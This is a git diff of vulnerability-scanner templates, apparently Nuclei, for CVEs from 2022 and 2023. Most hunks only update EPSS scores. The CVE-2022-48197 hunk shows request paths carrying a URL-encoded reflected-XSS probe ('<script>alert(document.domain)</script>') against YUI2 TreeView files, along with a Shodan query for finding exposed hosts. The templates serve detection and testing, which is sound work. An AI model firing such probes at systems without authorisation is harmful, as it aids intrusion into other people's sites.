cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index 3f9a2bee8a..ad8c591a7b 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43169 cwe-id: CWE-79 - epss-score: 0.00076 - epss-percentile: 0.31098 + epss-score: 0.00268 + epss-percentile: 0.6399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 296fc28802..bf4d9b1bfd 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43170 cwe-id: CWE-79 - epss-score: 0.08907 - epss-percentile: 0.93778 + epss-score: 0.24601 + epss-percentile: 0.96078 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index efccbc0599..1e312add66 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43185 cwe-id: CWE-79 - epss-score: 0.29169 - epss-percentile: 0.96291 + epss-score: 0.39089 + epss-percentile: 0.96789 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index 5e1cacb62e..a17bececdb 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4320 cwe-id: CWE-79 - epss-score: 0.00075 - epss-percentile: 0.30732 + epss-score: 0.00083 + epss-percentile: 0.34569 cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 5918d0eced..b460426e5f 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4321 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26173 + epss-score: 0.00071 + epss-percentile: 0.29353 cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index 8e966b1a4f..8ffd6e4d63 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4325 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29012 + epss-percentile: 0.29353 cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index 2b90d00ecf..cc1b9c0e8c 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4328 cwe-id: CWE-434 - epss-score: 0.96022 - epss-percentile: 0.9925 + epss-score: 0.88386 + epss-percentile: 0.98325 cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 32f9fcdb9a..7db23579ce 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 - epss-score: 0.59738 - epss-percentile: 0.97318 + epss-score: 0.21841 + epss-percentile: 0.95889 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 8bd7152a0d..47befb55cc 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4447 cwe-id: CWE-89 - epss-score: 0.422 - epss-percentile: 0.96835 + epss-score: 0.11201 + epss-percentile: 0.94532 cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 4402472f87..41e0897e66 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44877 cwe-id: CWE-78 - epss-score: 0.97473 - epss-percentile: 0.99945 + epss-score: 0.97422 + epss-percentile: 0.99909 cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index c701dcab4e..9ec63d0d52 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44944 cwe-id: CWE-79 - epss-score: 0.00074 - epss-percentile: 0.3053 + epss-score: 0.00239 + epss-percentile: 0.61613 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index aae88ccb6c..25c4dd2576 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44946 cwe-id: CWE-79 - epss-score: 0.00074 - epss-percentile: 0.3053 + epss-score: 0.00239 + epss-percentile: 0.61613 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index a87e8ae434..54fc52d4d0 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44947 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36702 + epss-score: 0.00284 + epss-percentile: 0.65006 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index aa4255478e..9721113955 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44948 cwe-id: CWE-79 - epss-score: 0.00074 - epss-percentile: 0.3053 + epss-score: 0.00239 + epss-percentile: 0.61613 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index baf57d7b3b..b8191cb186 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44949 cwe-id: CWE-79 - epss-score: 0.00074 - epss-percentile: 0.3053 + epss-score: 0.00239 + epss-percentile: 0.61613 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 74d911c817..963ff1c3a4 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44950 cwe-id: CWE-79 - epss-score: 0.00074 - epss-percentile: 0.3053 + epss-score: 0.00239 + epss-percentile: 0.61613 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index b3b3fc22f5..98b48d4063 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44951 cwe-id: CWE-79 - epss-score: 0.00074 - epss-percentile: 0.3053 + epss-score: 0.00239 + epss-percentile: 0.61613 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 9c0ef4ed25..c33b9699c7 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44952 cwe-id: CWE-79 - epss-score: 0.06042 - epss-percentile: 0.92539 + epss-score: 0.16593 + epss-percentile: 0.95408 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index e357a922aa..a8c6ec1c8b 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-45037 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.31826 + epss-percentile: 0.32183 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index ea453bea03..a17b1c6530 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-45038 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.31826 + epss-percentile: 0.32183 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 60dd833485..fbc3ed42bd 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-45917 cwe-id: CWE-601 - epss-score: 0.00135 - epss-percentile: 0.47995 + epss-score: 0.00082 + epss-percentile: 0.34126 cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 5ea9aca74e..5b27c39cb2 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-45933 cwe-id: CWE-306 - epss-score: 0.00535 - epss-percentile: 0.74218 + epss-score: 0.00733 + epss-percentile: 0.7864 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index c10858d4eb..e9d9891c0a 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 - epss-score: 0.00887 - epss-percentile: 0.8053 + epss-score: 0.01477 + epss-percentile: 0.85293 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 074c2393a1..ff27449c8c 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46071 cwe-id: CWE-89 - epss-score: 0.01728 - epss-percentile: 0.86294 + epss-score: 0.0119 + epss-percentile: 0.83557 cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index e5f77e224f..4839ca61e0 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46073 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.31755 + epss-score: 0.00066 + epss-percentile: 0.27659 cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index a78ac4b0a0..06d57817ed 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -18,9 +18,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46169 - cwe-id: CWE-78,CWE-74 - epss-score: 0.96817 - epss-percentile: 0.99543 + cwe-id: CWE-74,CWE-78 + epss-score: 0.967 + epss-percentile: 0.99522 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index c999f74e9d..e106f5d806 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-46381 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29012 + epss-percentile: 0.29353 cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index b50863f36f..e0d84a68a8 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-46443 cwe-id: CWE-89 - epss-score: 0.11658 - epss-percentile: 0.94542 + epss-score: 0.06249 + epss-percentile: 0.92765 cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 2074edbf42..b1500785b8 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-46463 cwe-id: CWE-306 - epss-score: 0.01786 - epss-percentile: 0.86525 + epss-score: 0.01987 + epss-percentile: 0.8749 cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 07f7de825d..5b3b9e146f 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46888 cwe-id: CWE-79 - epss-score: 0.00081 - epss-percentile: 0.33383 + epss-score: 0.00089 + epss-percentile: 0.37566 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index b9a92660cc..3d632e4039 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46934 cwe-id: CWE-79 - epss-score: 0.00076 - epss-percentile: 0.31252 + epss-score: 0.00085 + epss-percentile: 0.35306 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index c87f3accd0..afa37ff27e 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47002 cwe-id: CWE-863 - epss-score: 0.03141 - epss-percentile: 0.89824 + epss-score: 0.03743 + epss-percentile: 0.90734 cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 3ee933bddc..d508a439bb 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47003 cwe-id: CWE-863 - epss-score: 0.01777 - epss-percentile: 0.86482 + epss-score: 0.02081 + epss-percentile: 0.87805 cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 031ccd3df9..1986a6faac 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47615 cwe-id: CWE-434 - epss-score: 0.00837 - epss-percentile: 0.79914 + epss-score: 0.01135 + epss-percentile: 0.83099 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 27025e8b5e..f428c85d56 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47945 cwe-id: CWE-22 - epss-score: 0.05688 - epss-percentile: 0.92344 + epss-score: 0.04956 + epss-percentile: 0.91913 cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 8c6113c600..0cd952af61 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47966 - epss-score: 0.97467 - epss-percentile: 0.99939 + epss-score: 0.97053 + epss-percentile: 0.99672 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index fd4175d965..a7263ae176 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47986 cwe-id: CWE-502 - epss-score: 0.93666 - epss-percentile: 0.98767 + epss-score: 0.89798 + epss-percentile: 0.98414 cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index d45b1d5b30..1a4b771fa2 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-48012 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26092 + epss-score: 0.00071 + epss-percentile: 0.29299 cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index f28847931e..ad1b67831f 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-48165 cwe-id: CWE-284 - epss-score: 0.04725 - epss-percentile: 0.91602 + epss-score: 0.0298 + epss-percentile: 0.8974 cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 86806545e4..1bc93b1516 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -6,22 +6,28 @@ info: severity: medium description: | Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/51198 - https://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2022-48197 - remediation: Upgrade to the latest version to mitigate this vulnerability. + - http://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html + - https://github.com/ryan412/CVE-2022-48197/blob/main/README.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-48197 cwe-id: CWE-79 + epss-score: 0.00139 + epss-percentile: 0.49045 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:* metadata: - max-request: 9 - shodan-query: html:"bower_components/yui2/" verified: true - tags: yui2,cve,cve2022,xss,yahoo,treeview + max-request: 9 + vendor: yui_project + product: yui + shodan-query: html:"bower_components/yui2/" + tags: packetstorm,yui2,cve,cve2022,xss,yahoo,treeview http: - method: GET @@ -37,6 +43,7 @@ http: - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 6ed061333a..e2947f3ac0 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4897 cwe-id: CWE-79 - epss-score: 0.00261 - epss-percentile: 0.63049 + epss-score: 0.00289 + epss-percentile: 0.65326 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 45fba91329..3d64491e71 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0099 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26173 + epss-score: 0.00071 + epss-percentile: 0.29353 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 0f2fc78f8a..6e691dd9b9 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 - epss-score: 0.03359 - epss-percentile: 0.90145 + epss-score: 0.03979 + epss-percentile: 0.90997 cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 5ffd50bc83..2a2e0b6ec2 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0236 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26173 + epss-score: 0.00071 + epss-percentile: 0.29353 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 458a7aa48f..688e0630b0 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-0261 cwe-id: CWE-89 - epss-score: 0.01065 - epss-percentile: 0.8235 + epss-score: 0.05279 + epss-percentile: 0.9217 cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 2868378f31..1a19234929 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0297 cwe-id: CWE-94 - epss-score: 0.32256 - epss-percentile: 0.96441 + epss-score: 0.31116 + epss-percentile: 0.96439 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 18287debda..a56018fe86 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26173 + epss-score: 0.00071 + epss-percentile: 0.29353 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 215d0c79be..1629c3090a 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-0514 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29093 + epss-percentile: 0.29433 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 17660e7a76..1db999d739 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -19,7 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 - epss-score: 0.00582 + epss-score: 0.00668 + epss-percentile: 0.77409 cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index 12cd92e1cb..c8de9a2ba6 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0552 cwe-id: CWE-601 epss-score: 0.0007 - epss-percentile: 0.28777 + epss-percentile: 0.29109 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index c5b5f90068..1e072bf463 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0562 cwe-id: CWE-89 - 